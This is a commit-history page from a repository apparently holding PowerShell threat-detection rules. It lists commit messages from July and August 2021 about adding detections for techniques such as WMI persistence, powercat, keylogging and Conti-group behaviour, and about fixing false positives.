blue-team-tools

Author	SHA1	Message	Date
f.hubaut	e66007a43d	fix file name case	2021-08-26 11:15:33 +02:00
$frack113$ frack113	33c6ff6b5f	add powershell_suspicious_win32_pnpentity	2021-08-23 13:17:35 +02:00
$frack113$ frack113	fc9666fb4e	Merge pull request #1896 from ZikyHD/fix_old_technics Replace old mitre techniques by new one	2021-08-22 18:56:08 +02:00
$frack113$ frack113	0a410010a2	Merge pull request #1877 from frack113/red_back Add t1546 redcanary rules	2021-08-22 18:50:58 +02:00
SomeOne	295054dcbe	Replace old mitre techniques by new one	2021-08-22 13:57:56 +02:00
$frack113$ frack113	42c90b9d20	fix powershell_psattack error	2021-08-21 10:05:47 +02:00
$frack113$ frack113	2f683b9ab7	fix powershell_clear_powershell_history error	2021-08-21 10:00:48 +02:00
$frack113$ frack113	0fb6c35b1f	Cleanup PS rules	2021-08-21 09:58:58 +02:00
$frack113$ frack113	da839775fe	Update PS rules	2021-08-21 09:50:59 +02:00
$frack113$ frack113	6c529f7ab2	Update PS rules	2021-08-21 09:33:52 +02:00
$frack113$ frack113	cb95582077	Update PowerShell rule	2021-08-21 09:08:38 +02:00
$frack113$ frack113	78212546a7	Merge pull request #1869 from frack113/redcanary_T1546.013 powershell_trigger_profiles T1546.013	2021-08-19 16:17:53 +02:00
$frack113$ frack113	90c9c08743	fix title	2021-08-19 16:09:31 +02:00
$frack113$ frack113	89b6e1108b	powershell_wmi_persistence fix errors	2021-08-19 15:42:19 +02:00
$frack113$ frack113	1266a66a8d	add powershell_wmi_persistence.yml	2021-08-19 15:37:28 +02:00
Florian Roth	459a0bdca1	Merge pull request #1870 from frack113/fix_fp_Renamed_Powershell Fix some false positives in renamed powershell	2021-08-19 08:23:51 +02:00
Austin Songer	c9128687ee	Spelling Errors on Rules	2021-08-18 18:58:20 +00:00
$frack113$ frack113	2d05eda1be	fix ContextInfo FP	2021-08-18 15:18:29 +02:00
$frack113$ frack113	48d0846b53	add powershell_trigger_profiles	2021-08-18 14:29:50 +02:00
$frack113$ frack113	6a282ad24a	fix many FP	2021-08-18 13:56:14 +02:00
Florian Roth	5fa5a412d5	fix: FPs with [reflection.assembly]::Load	2021-08-18 09:49:34 +02:00
Florian Roth	a0625ad074	Merge branch 'master' into rule-devel	2021-08-17 12:29:55 +02:00
Florian Roth	80b3acfce9	fix: false positive with Xen / Oracle scripts	2021-08-17 12:03:49 +02:00
$frack113$ frack113	dfd9e6d8f0	Merge pull request #1857 from frack113/fix_HostApplication Update definition for powershell-classic rule	2021-08-16 17:18:24 +02:00
Florian Roth	141ca03c9b	Merge pull request #1853 from secDre4mer/contileak feat: Add some rules to detect Conti behaviour	2021-08-16 14:18:43 +02:00
$frack113$ frack113	911579023c	fix powershell_alternate_powershell_hosts.yml	2021-08-16 13:30:45 +02:00
$frack113$ frack113	2dbf9af27d	add definition to powershell-classic	2021-08-16 12:56:24 +02:00
$frack113$ frack113	e8723e892a	clean-up powershell_invoke_nightmare.yml	2021-08-16 09:19:10 +02:00
Max Altgelt	5b60e0ea5a	feat: Add some rules to detect Conti behaviour Add rules based on the leaks from the Conti group to detect malicious behaviour.	2021-08-16 09:13:51 +02:00
Max Altgelt	d2a35edae9	fix: Remove powershell_alternate_hosts from PR Remove a rule using Host Application (which may or may not exist, based on the log parser) from the PR. A future PR will clean up rules using Host Application.	2021-08-16 08:42:17 +02:00
Max Altgelt	6f05e33feb	fix: Correct incorrect message / keyword usage Correct a number of rules where message or keyword were incorrectly used as field names in events (typically windows event logs). However, neither field actually exists and as such these strings could never match.	2021-08-12 16:28:07 +02:00
Florian Roth	c44b22b52f	Merge pull request #1762 from frack113/redcanary_collection [OSCD] Redcanary TA0009 collection	2021-08-05 15:49:10 +02:00
Florian Roth	448868302d	Merge pull request #1767 from frack113/redcanary_t1497_001 [OSCD] Detect Virtualization Environment (Windows) T1497.001	2021-08-05 15:47:37 +02:00
Florian Roth	3634901bf1	Update poweshell_detect_vm_env.yml	2021-08-05 15:47:29 +02:00
Florian Roth	6a11190e79	Merge pull request #1769 from frack113/fix_powershell_400 Cleanup eventid 400 powershell-classic	2021-08-05 15:47:04 +02:00
Florian Roth	da6b5f8ec5	Merge pull request #1770 from frack113/redcanary_powershell_T1070.006 [OSCD] powershell_timestomp.yml T1070.006	2021-08-05 15:46:48 +02:00
Florian Roth	b1fb462c39	Update powershell_timestomp.yml	2021-08-05 15:46:01 +02:00
$frack113$ frack113	f040725dd8	fix EventID: 4104 ScriptBlockText	2021-08-04 14:49:50 +02:00
$frack113$ frack113	644fe80786	add powershell_timestomp.yml	2021-08-03 16:01:54 +02:00
$frack113$ frack113	b5e4b04cb5	fix eventid 400 powershell-classic	2021-08-03 10:04:15 +02:00
$frack113$ frack113	0efe69bd36	add poweshell_detect_vm_env.yml	2021-08-03 08:30:26 +02:00
$frack113$ frack113	e33ec91b9a	add powershell_keylogging.yml	2021-07-30 08:28:19 +02:00
$frack113$ frack113	38ede57cb4	add powershell_suspicious_recon.yml	2021-07-30 08:20:51 +02:00
$frack113$ frack113	2758c1aa93	add powershell_automated_collection.yml	2021-07-28 14:14:02 +02:00
$frack113$ frack113	aff5264096	Add check for status and level	2021-07-22 19:25:51 +02:00
Florian Roth	edfd082754	Merge pull request #1716 from frack113/elk_keyword_rule powershell_nishang_malicious_commandlets Elk keywords trouble	2021-07-22 15:01:13 +02:00
Florian Roth	7a8fcf4237	Merge pull request #1718 from frack113/powercat [OSCD] powershell_powercat.yml T1095	2021-07-22 14:53:34 +02:00
$frack113$ frack113	4cc4df35d8	add powershell_suspicious_mail_acces.yml	2021-07-21 15:27:12 +02:00
$frack113$ frack113	72da7a3053	fix tags attack.t1095	2021-07-21 13:08:35 +02:00
$frack113$ frack113	41c4f1d157	add powershell_powercat.yml	2021-07-21 13:04:27 +02:00

1 2 3 4 5 ...

383 Commits